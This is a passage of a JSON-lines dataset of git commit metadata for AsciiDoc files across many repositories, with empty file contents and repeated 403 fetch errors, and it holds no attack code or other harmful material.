a96c878f7fc93a05ebd88054abed3861fec7342a.\n","repos":"smithed\/nanomsg,ttyangf\/nanomsg,simplestbest\/nanomsg,pch957\/nanomsg,kaostao\/nanomsg,reqshark\/nanomsg,potatogim\/nanomsg,pakozm\/nanomsg,pch957\/nanomsg,ttyangf\/nanomsg,reqshark\/nanomsg,featherweight\/ftw-kernel-nanomsg,modulexcite\/nanomsg,smithed\/nanomsg,wfxiang08\/nanomsg,reqshark\/nanomsg,TTimo\/nanomsg,hyperfact\/nanomsg,nirs\/nanomsg,wirebirdlabs\/featherweight-nanomsg,nirs\/nanomsg,zerotacg\/nanomsg,linearregression\/nanomsg,hyperfact\/nanomsg,imp\/nanomsg,kaostao\/nanomsg,krafczyk\/nanomsg,cosin2008\/nanomsg.NET,simplestbest\/nanomsg,pakozm\/nanomsg,wirebirdlabs\/featherweight-nanomsg,zerotacg\/nanomsg,nirs\/nanomsg,simplestbest\/nanomsg,linearregression\/nanomsg,imp\/nanomsg,gdamore\/mamomsg,linearregression\/nanomsg,pakozm\/nanomsg,tempbottle\/nanomsg,cosin2008\/nanomsg.NET,potatogim\/nanomsg,tempbottle\/nanomsg,modulexcite\/nanomsg,thisco-de\/nanomsg,JackDunaway\/featherweight-nanomsg,gdamore\/mamomsg,wfxiang08\/nanomsg,krafczyk\/nanomsg,yan97ao\/nanomsg,thisco-de\/nanomsg,wirebirdlabs\/featherweight-nanomsg,snikulov\/nanomsg,hyperfact\/nanomsg,krafczyk\/nanomsg,TTimo\/nanomsg,potatogim\/nanomsg,smithed\/nanomsg,zerotacg\/nanomsg,gdamore\/mamomsg,kaostao\/nanomsg,modulexcite\/nanomsg,JackDunaway\/featherweight-nanomsg,TTimo\/nanomsg,wfxiang08\/nanomsg,snikulov\/nanomsg,ttyangf\/nanomsg,cosin2008\/nanomsg.NET,ttyangf\/nanomsg,pch957\/nanomsg,TTimo\/nanomsg,featherweight\/ftw-kernel-nanomsg,yan97ao\/nanomsg,yan97ao\/nanomsg,smithed\/nanomsg,tempbottle\/nanomsg,imp\/nanomsg,kaostao\/nanomsg,JackDunaway\/featherweight-nanomsg","old_file":"README.asciidoc","new_file":"README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/featherweight\/ftw-kernel-nanomsg.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7c4a6b355183b13ee06c52721779500e2eb3c0e","subject":"Add README for sgcollect_info (#3163)","message":"Add README for sgcollect_info (#3163)\n\n* Add README for sgcollect_info\r\n\r\n* ns_server link + Go version table\r\n\r\n* Update README.adoc\r\n\r\n* Address PR Feedback\r\n\r\n* Fix minor typos in sgcollect_info readme\r\n","repos":"couchbaselabs\/sync_gateway,ceejatec\/sync_gateway,ceejatec\/sync_gateway,couchbaselabs\/sync_gateway,ceejatec\/sync_gateway,couchbaselabs\/sync_gateway,ceejatec\/sync_gateway,couchbaselabs\/sync_gateway","old_file":"tools\/README.adoc","new_file":"tools\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/couchbaselabs\/sync_gateway.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"aefb40944286640c4ec463583e94d8cc469ba053","subject":"another fix from Bilal","message":"another fix from Bilal\n","repos":"dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_toc.asciidoc","new_file":"trex_toc.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9752f8270205e4f80fdb2d1148e08f4534d2dde3","subject":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","message":"Update 2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_file":"_posts\/2016-03-28-Deploying-open-A-M-12-on-mesos.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae0a64026b3f477d23ca1b9deb275a79eb0e1df5","subject":"Update 2019-03-12-A-B.adoc","message":"Update 2019-03-12-A-B.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-12-A-B.adoc","new_file":"_posts\/2019-03-12-A-B.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b98b58beb26b504fa099a5bfe5becd15e639ac48","subject":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","message":"Update 2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_file":"_posts\/2016-09-21-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Unidad-2-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eea9fe1cc49a31827fc0611f358aaf97ddc37e4b","subject":"Minor fixes","message":"Minor fixes\n","repos":"cjdb\/cs6771-16s2,cjdb\/cs6771-16s2","old_file":"asciidoc\/week04.asciidoc","new_file":"asciidoc\/week04.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cjdb\/cs6771-16s2.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"64b504c238b0259b799ac0470eba5c355c63a9b3","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/08\/27\/deref.adoc","new_file":"content\/news\/2021\/08\/27\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2db307ddfdae6ed32def075fd4b70507c8f46288","subject":"Worked on Programs Cache documentation.","message":"Worked on Programs Cache documentation.\n","repos":"libyal\/winreg-kb,libyal\/winreg-kb","old_file":"documentation\/Programs Cache values.asciidoc","new_file":"documentation\/Programs Cache values.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/winreg-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9c63616ad808ad025683657d7a7d8303526c3282","subject":"Update 2017-01-26-Updating-the-blog-version.adoc","message":"Update 2017-01-26-Updating-the-blog-version.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_file":"_posts\/2017-01-26-Updating-the-blog-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"527d152c43748ab33d4c0f32c2fdb7a7081f0332","subject":"Update 2016-06-28-Resume.adoc","message":"Update 2016-06-28-Resume.adoc","repos":"iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io,iveskins\/iveskins.github.io","old_file":"_posts\/2016-06-28-Resume.adoc","new_file":"_posts\/2016-06-28-Resume.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iveskins\/iveskins.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be2848e6c4420972f211a0bc326bbf179670d1f3","subject":"Update 2017-05-31-A-test.adoc","message":"Update 2017-05-31-A-test.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-A-test.adoc","new_file":"_posts\/2017-05-31-A-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7348febd7c1effc914f322dfab383838c33855c3","subject":"Update 2017-12-08-Go-O-R.adoc","message":"Update 2017-12-08-Go-O-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-Go-O-R.adoc","new_file":"_posts\/2017-12-08-Go-O-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"98f08ab68eeec20f7dcfead813004e42bb945135","subject":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","message":"Update 2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_file":"_posts\/2015-08-27-copy-docker-images-from-one-docker-machine-to-another.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"445798a02ccd9994abf76ee90123c2e7d3c913c5","subject":"Update 2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","message":"Update 2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","new_file":"_posts\/2016-03-23-Is-Star-Lord-checking-in-at-the-Hollywood-Tower-Hotel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c98adfdcc26dfc8e83b7bf4b294242e5cb14d5ca","subject":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-03-06-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4250b4bac832b25849dd746e37a4b45c307dbdbb","subject":"Update index.adoc","message":"Update index.adoc\n\nEnglish grammar.","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"7ad16ffd84046a200e0b7ef9a8ac0388e4d62f74","subject":"Docs: Correcting a typo in tophits (#32359)","message":"Docs: Correcting a typo in tophits (#32359)\n\n","repos":"nknize\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,HonzaKral\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,nknize\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,scorpionvicky\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,robin13\/elasticsearch,uschindler\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,nknize\/elasticsearch,scorpionvicky\/elasticsearch,uschindler\/elasticsearch","old_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_file":"docs\/reference\/aggregations\/metrics\/tophits-aggregation.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b057b7445006439c116d8c70cb27a5b63957593f","subject":"Update 2016-09-21-CircleCI-mono-project.adoc","message":"Update 2016-09-21-CircleCI-mono-project.adoc","repos":"aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io,aspick\/hubpress.io","old_file":"_posts\/2016-09-21-CircleCI-mono-project.adoc","new_file":"_posts\/2016-09-21-CircleCI-mono-project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/aspick\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"246f5197bb819310d862e83150f44b64b819b579","subject":"update","message":"update\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/2017-09-01-fud5-day4.adoc","new_file":"_posts\/2017-09-01-fud5-day4.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5e0bef6b42fd2e443716dab72e2c34f23ef0ea01","subject":"Update 2016-07-24-Forensic-Sasser-worm.adoc","message":"Update 2016-07-24-Forensic-Sasser-worm.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_file":"_posts\/2016-07-24-Forensic-Sasser-worm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7f39056b0e4fc2142cb0f2b06a120dbd59097a16","subject":"Update 2016-02-20-Comecando-com-Cordova.adoc","message":"Update 2016-02-20-Comecando-com-Cordova.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_file":"_posts\/2016-02-20-Comecando-com-Cordova.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"46838db140803e747d376c9ff523711b00491ccd","subject":"update product to community mapping","message":"update product to community mapping\n","repos":"oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website","old_file":"community\/product.adoc","new_file":"community\/product.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e58dd1c8bd3c424e96e95aadccc3a00a50b80fd6","subject":"remove mac-spread","message":"remove mac-spread\n\nSigned-off-by: Hanoh Haim <1f34741bfa88280155d5053f5e8f4b89d8aa79bf@cisco.com>\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"396307b2baacfcba4df0d0e2998f78831663052d","subject":"Update 2016-05-13-Engineer-Career-Path.adoc","message":"Update 2016-05-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_file":"_posts\/2016-05-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5a8b68ab6421af1b0124519fce55c1b26c1704da","subject":"Init Project","message":"Init Project\n\nSigned-off-by: Mike Schilling <49f7fbe9e108b60288e59e5258af85ba6e5f3584@gmail.com>\n","repos":"bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank,bindstone\/graphbank","old_file":"readme.adoc","new_file":"readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bindstone\/graphbank.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ac3cf12930d76f7ae5d3cdbc71baa3758705bd02","subject":"Note to install \"which\" command in the installation guide in case of building on RHEL\/CentOS.","message":"Note to install \"which\" command in the installation guide in case of building on RHEL\/CentOS.\n\nI tried to build on Docker container with official CentOS7 image and \nwhen I tried to build thirdparty libraries, I caught an error message as follows.\n\n+ \/root\/work\/kudu\/thirdparty\/preflight.py\nRunning pre-flight checks\n-------------------------\nUsing C compiler: c++\nUsing C++ compiler: c++\n\n (Set $CC and $CXX to change compiler)\n-------------------------\nChecking for autoconf\nTraceback (most recent call last):\n File \"\/root\/work\/kudu\/thirdparty\/preflight.py\", line 149, in <module>\n sys.exit(main())\n File \"\/root\/work\/kudu\/thirdparty\/preflight.py\", line 141, in main\n check_tools()\n File \"\/root\/work\/kudu\/thirdparty\/preflight.py\", line 97, in check_tools\n if subprocess.call([\"which\", tool], stdout=DEV_NULL, stderr=DEV_NULL) != 0:\n File \"\/usr\/lib64\/python2.7\/subprocess.py\", line 524, in call\n return Popen(*popenargs, **kwargs).wait()\n File \"\/usr\/lib64\/python2.7\/subprocess.py\", line 711, in __init__\n errread, errwrite)\n File \"\/usr\/lib64\/python2.7\/subprocess.py\", line 1327, in _execute_child\n raise child_exception\nOSError: [Errno 2] No such file or directory\n\nThis message means that \"which\" command is absent.\nOf course, I understand it's very rare case that \"which\" is absent but I think \nit's better to note just in case to install \"which\" command in the installation guide.\n\nChange-Id: If02eae6f22a51965120a037cc9a68ddefa418b6c\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/5216\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@apache.org>\n","repos":"helifu\/kudu,cloudera\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,andrwng\/kudu,helifu\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,InspurUSA\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,andrwng\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,helifu\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f409afd6d86bd53bae38f5dede6c05ffbb44abc","subject":"Added InvisiMole IoCs","message":"Added InvisiMole IoCs\n","repos":"eset\/malware-ioc,eset\/malware-ioc","old_file":"invisimole\/README.adoc","new_file":"invisimole\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-ioc.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"849fc5062175e7ed373476d9980b46b7b332b202","subject":"Update 2017-05-31-TWCTF-2017.adoc","message":"Update 2017-05-31-TWCTF-2017.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_file":"_posts\/2017-05-31-TWCTF-2017.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38121c6bf8617f19c92643f2273d3a867672ce05","subject":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Update 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"_posts\/2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1beda1d680f933fadb50f9212d828d79c1e19e8f","subject":"add ClojureBridge Seoul","message":"add ClojureBridge Seoul\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojurebridge-seoul.adoc","new_file":"content\/events\/2017\/clojurebridge-seoul.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b0458c6847e8fd4e5f8d77108ae54aa2001e8d5f","subject":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","message":"Update 2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","repos":"neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io,neocarvajal\/neocarvajal.github.io","old_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_file":"_posts\/2016-09-14-Curso-Online-Abierto-Seguridad-2016-Hacking-etico-2-ed-Parte-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neocarvajal\/neocarvajal.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1c54954194512621ec3c4902c095e47419f1b20e","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9b01c1b5ed0dadcdadff0f5e4c356473cd00dae","subject":"Update 2019-12-31-prayer.adoc","message":"Update 2019-12-31-prayer.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-31-prayer.adoc","new_file":"_posts\/2019-12-31-prayer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16bd6475f8686ee45e68c32a1c6a4095c3fc7892","subject":"Update 2016-12-22-Larastudy.adoc","message":"Update 2016-12-22-Larastudy.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-22-Larastudy.adoc","new_file":"_posts\/2016-12-22-Larastudy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fa535278e80d9ec94d582db048efc08c325b354","subject":"doc: add man page for daniel-export","message":"doc: add man page for daniel-export\n\nSigned-off-by: brian m. carlson <738bdd359be778fee9f0fc4e2934ad72f436ceda@crustytoothpaste.net>\n","repos":"bk2204\/daniel-ruby,bk2204\/daniel-ruby","old_file":"doc\/daniel-export.adoc","new_file":"doc\/daniel-export.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bk2204\/daniel-ruby.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2a7eb5b5f626ffee34676b957b107e03cd821749","subject":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","message":"Update 2016-03-31-Los-rompe-Codigos-Parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_file":"_posts\/2016-03-31-Los-rompe-Codigos-Parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5baabff6670a8ed49297488ca8cac8ec12a2078d","subject":"[DOCS] Update mapping API to require index name (#71489)","message":"[DOCS] Update mapping API to require index name (#71489)\n\n","repos":"GlenRSmith\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,robin13\/elasticsearch,GlenRSmith\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/reference\/indices\/put-mapping.asciidoc","new_file":"docs\/reference\/indices\/put-mapping.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/robin13\/elasticsearch.git\/': The requested URL returned error: 